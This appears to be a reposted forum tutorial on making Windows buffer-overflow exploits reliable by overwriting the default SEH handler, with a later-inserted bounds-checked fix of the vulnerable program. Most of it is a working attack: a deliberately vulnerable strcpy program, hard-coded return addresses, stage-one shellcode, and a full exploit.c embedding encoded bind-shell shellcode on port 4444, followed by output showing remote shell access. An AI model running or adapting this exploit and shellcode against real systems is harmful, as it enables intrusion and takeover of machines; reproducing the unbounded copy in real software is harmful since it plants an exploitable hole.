Mathematical Modeling Community - Math China

Title: Exploiting Default Exception Handler to Increase Exploit Sta

Author: 韩冰    Posted: 2004-11-19 10:39
The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address, but in this case we will continue overwriting the stack and overwrite the default exception handler as well.

[Buf] <- Shellcode
[Return Address] <- jmp register (for Windows XP SP1)
[Various Stack Data] <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler] <- jmp register (for Win2k SP4)
[Stage1 Shellcode] <- stage1 shellcode for Win2k

If the first return address (Windows XP SP1) is wrong, an exception will occur and the default exception handler will be called (Windows 2000 SP4), allowing us to create a stable exploit with two return addresses.

Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm

Vulnerable Code:
//lamebuf.c
#include<stdio.h>
#include<string.h>
#include<windows.h>
int main(int argc,char *argv[]){

char buf[512];
char buf1[1024]; // <- simulate a stack
//DebugBreak();
if (argc != 2){ return -1; }

strcpy(buf,argv[1]); // unbounded copy: argv[1] longer than 512 bytes overwrites the stack
return 0x0;
}
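
As an added example (not part of the original post and not the author's code), here is the bounds-checked counterpart of lamebuf.c: the same argc check, but the argument is only copied when it fits in the 512-byte buffer, so the 1600-byte input used below is rejected before it can reach the return address or the SEH record. The names copy_bounded, handle_args and probe_length are chosen here; the file builds with any C compiler and does not need windows.h.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 512   /* same buffer size as lamebuf.c */

/* Copy src into dst only when it fits, NUL terminator included.
 * Returns 0 on success and -1 when the input would overflow dst.
 * Unlike strcpy(), it never writes beyond dst[dst_size - 1]. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n = 0;
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    /* Measure src, but stop looking once it is already too long. */
    while (n < dst_size && src[n] != '\0')
        n++;
    if (n == dst_size)          /* no room left for the terminator */
        return -1;
    memcpy(dst, src, n + 1);    /* n bytes plus the NUL */
    return 0;
}

/* The program logic of lamebuf.c with the copy bounds-checked.
 * Returns 0 on success, -1 on bad usage, -2 when argv[1] is rejected. */
int handle_args(int argc, char *argv[])
{
    char buf[BUF_SIZE];
    if (argc != 2)
        return -1;
    if (copy_bounded(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return -2;
    }
    /* buf is now a properly terminated copy; use it as the program needs. */
    return 0;
}

/* Feeds a constructed argument of `len` 'A' bytes (the post's overflow
 * attempt used 1600 of them) through handle_args() and returns its result.
 * Returns -1 if len does not fit the scratch buffer. */
int probe_length(size_t len)
{
    static char arg[4096];
    char *argv[3];
    if (len >= sizeof arg)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    argv[0] = "lamebuf.exe";
    argv[1] = arg;
    argv[2] = NULL;
    return handle_args(2, argv);
}

int main(int argc, char *argv[])
{
    int rc = handle_args(argc, argv);
    if (rc == 0)
        puts("argument accepted");
    return rc == 0 ? 0 : 1;
}
```

The check is deliberately "fits or fails" rather than a silent truncation (strncpy-style), because a truncated copy can still leave an unterminated buffer and hides the fact that the caller received abnormal input; with the fixed crash from the register dump below, this is exactly the input that would otherwise have rewritten EIP and the SEH record.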

Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.

Primary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that ESP points to user input, so we will use that as our first-stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and our first-stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k SP4 EN), and our first-stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"

Proof Of Concept:
// exploit.c
// Tal zeltzer - [Double Return] //

#include<stdio.h>
#include<string.h>
#include<windows.h>
#include<process.h> // execve()

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc,char *argv[]){

char *bufExe[3];
char buf[2048];
bufExe[0] = "lamebuf.exe";
bufExe[2] = NULL;

memset(buf,0x0,sizeof(buf));
memset(buf,0x90,1652);
memcpy(&buf[24],shellcode,sizeof(shellcode)-1);

memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage1 Shellcode

*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en

bufExe[1] = buf;
//Execute the vulnerable application
execve(bufExe[0],bufExe,NULL);

return 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.